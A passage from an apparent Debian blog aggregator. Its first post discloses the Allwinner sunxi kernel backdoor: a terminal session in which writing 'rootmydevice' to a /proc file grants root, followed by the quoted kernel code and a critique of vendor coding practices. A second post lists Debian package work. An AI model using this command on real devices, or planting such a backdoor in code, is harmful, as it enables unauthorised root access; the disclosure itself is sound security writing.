Linux bananapi 3.4.39-BPI-M3-Kernel #9 SMP PREEMPT Wed Sep 23 15:37:29 HKT 2015 armv7l
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gwolf@banana:~$ id
uid=1001(gwolf) gid=1001(gwolf) groups=1001(gwolf),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
gwolf@banana:~$ echo rootmydevice > /proc/sunxi_debug/sunxi_debug
gwolf@banana:~$ id
groups=0(root),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),1001(gwolf)
Why? Oh, well, in this kernel somebody forgot to comment out (or outright remove!) the sunxi-debug.c file, or at the very least, a horrid part of code therein (it's a very small, simple file):
if(!strncmp("rootmydevice",(char*)buf,12)){
        cred = (struct cred *)__task_cred(current);
        cred->uid = 0;
        cred->gid = 0;
        cred->suid = 0;
        cred->euid = 0;
        cred->euid = 0;
        cred->egid = 0;
        cred->fsuid = 0;
        cred->fsgid = 0;
        printk("now you are root\n");
}
Now... Just by looking at this file, many things should be obvious. For example, this is not only dangerous and lazy (it exists so developers can debug by touching a file instead of... typing a password?), but also goes against the kernel coding guidelines: the file is not documented nor commented at all. Peeking around other files in the repository, it gets obvious that many files suffer from this same basic issue, and having this upstreamed will become a titanic task. If their programmers tried to adhere to the guidelines to begin with, integration would be a much easier path. Cutting the wrong corners will just increase the needed amount of work. Anyway, enough said by me. Some other sources of information exist, and there are surely many other mentions of this. I just had to repeat it for my local echo chamber, and for future reference in class! ;-)

30 April 2016

Chris Lamb: Free software activities in April 2016

Here is my monthly update covering a large part of what I have been doing in the free software world (previously):
Debian My work in the Reproducible Builds project was covered in our weekly reports. (#48, #49, #50, #51 & #52)
Uploads
  • redis (2:3.0.7-3) Adding, amongst some other changes, systemd LimitNOFILE support to allow a higher number of open file descriptors.


FTP Team

As a Debian FTP assistant I ACCEPTed 135 packages: aptitude, asm, beagle, blends, btrfs-progs, camitk, cegui-mk2, cmor-tables, containerd, debian-science, debops, debops-playbooks, designate-dashboard, efitools, facedetect, flask-testing, fstl, ganeti-os-noop, gnupg, golang-fsnotify, golang-github-appc-goaci, golang-github-benbjohnson-tmpl, golang-github-dchest-safefile, golang-github-docker-go, golang-github-dylanmei-winrmtest, golang-github-hawkular-hawkular-client-go, golang-github-hlandau-degoutils, golang-github-hpcloud-tail, golang-github-klauspost-pgzip, golang-github-kyokomi-emoji, golang-github-masterminds-semver-dev, golang-github-masterminds-vcs-dev, golang-github-masterzen-xmlpath, golang-github-mitchellh-ioprogress, golang-github-smartystreets-assertions, golang-gopkg-hlandau-configurable.v1, golang-gopkg-hlandau-easyconfig.v1, golang-gopkg-hlandau-service.v2, golang-objx, golang-pty, golang-text, gpaste, gradle-plugin-protobuf, grip, haskell-brick, haskell-hledger-ui, haskell-lambdabot-haskell-plugins, haskell-text-zipper, haskell-werewolf, hkgerman, howdoi, jupyter-client, jupyter-core, letsencrypt.sh, libbpp-phyl, libbpp-raa, libbpp-seq, libbpp-seq-omics, libcbor-xs-perl, libdancer-plugin-email-perl, libdata-page-pageset-perl, libevt, libevtx, libgit-version-compare-perl, libgovirt, libmsiecf, libnet-ldap-server-test-perl, libpgobject-type-datetime-perl, libpgobject-type-json-perl, libpng1.6, librest-client-perl, libsecp256k1, libsmali-java, libtemplates-parser, libtest-requires-git-perl, libtext-xslate-perl, linux, linux-signed, mandelbulber2, netlib-java, nginx, node-rc, node-utml, nvidia-cuda-toolkit, openfst, openjdk-9, openssl, php-cache-integration-tests, pulseaudio, pyfr, pygccxml, pytest-runner, python-adventure, python-arrayfire, python-django-feincms, python-fastimport, python-fitsio, python-imagesize, python-lib389, python-libtrace, python-neovim-gui, python3-proselint, pythonpy, pyzo, r-cran-ca, r-cran-fitbitscraper, r-cran-goftest, r-cran-rnexml, r-cran-rprotobuf, rrdtool, ruby-proxifier, ruby-seamless-database-pool, ruby-syslog-logger, rustc, s5, sahara-dashboard, salt-formula-ceilometer, salt-formula-cinder, salt-formula-glance, salt-formula-heat, salt-formula-horizon, salt-formula-keystone, salt-formula-neutron, salt-formula-nova, seer, simplejson, smrtanalysis, tiles-autotag, tqdm, tran, trove-dashboard, vim, vulkan, xapian-bindings & xapian-core.
